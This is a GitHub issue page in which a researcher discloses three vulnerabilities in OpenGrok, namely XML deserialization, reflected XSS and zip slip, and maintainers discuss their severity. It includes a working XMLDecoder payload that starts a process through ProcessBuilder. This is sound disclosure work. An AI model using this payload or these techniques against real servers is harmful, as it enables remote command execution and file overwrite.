Skip to content

multiple vulnerabilities in input data handling #2749

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Open
QiAnXinCodeSafe opened this issue Apr 12, 2019 · 4 comments
Open

multiple vulnerabilities in input data handling #2749

QiAnXinCodeSafe opened this issue Apr 12, 2019 · 4 comments
Labels
bug

Comments

@QiAnXinCodeSafe
Copy link

QiAnXinCodeSafe commented Apr 12, 2019
edited by vladak
Loading

Hi!
I am a 360 security guard staff member. We found multiple vulnerabilities in Opengrok in our open source code detection project. The details are as follows:
1.XML deserialization vulnerability
The set method in ConfigurationController.java receives the request body in the put request
图片
Finally, the parameter is passed to the decodeObject method and xml is deserialized.
图片
But the attacker will execute the command when passing the following request body.

<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0_131" class="java.beans.XMLDecoder">
    <object class="java.lang.ProcessBuilder">
        <array class="java.lang.String" length="1">
            <void index="0">
                <string>calc</string>
            </void>
        </array>
        <void method="start" />
    </object>
</java>

The same problem still exists at line 230 of FileHistoryCache.java

2.Reflective xss
Received two parameters r1 and r2 in the request at line 233 of PageConfig.java.
图片
Finally, after a series of patchwork (but no filtering), output in diff.jsp
E.g:
图片

3.zip_slip
Decompress the zip file in the extractArchive method of FileUtilities.java
图片
Since the zip entry name is not verified, when the zip file maliciously constructed by the attacker is decompressed (the entry name has "../" for path backtracking), the file can be decompressed to any directory, or even overwritten. System Files
@tulinkry
Copy link
Contributor

But the attacker will execute the command when passing the following request body.

Which body?

Thank you for your analysis.

@vladak
Copy link
Member

vladak commented Apr 12, 2019

The XML was entered unescaped in the markdown, I fixed it.

@vladak
Copy link
Member

vladak commented Apr 12, 2019

Basically, it passes ProcessBuilder with argument. I guess such problems will be eradicated with #2329.

@vladak
Copy link
Member

vladak commented Apr 12, 2019
edited
Loading

Ideally, this should have been entered as 3 separate issues, we might deal with them as such.

In general, it would be beneficial to have a discussion on what attack vectors are important to us. For example, the XML decoding problem can only happen when it is possible to submit new configuration (this is normally constrained to localhost thanks to LocalhostFilter) which would be a problem on its own so the problem described is not really serious. That said, it pokes another hole in our serialization scheme.

@vladak vladak changed the title Opengrok Vulnerability multiple vulnerabilities in input data handling Apr 12, 2019
@vladak vladak added the bug label Apr 12, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
bug
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@vladak @tulinkry @QiAnXinCodeSafe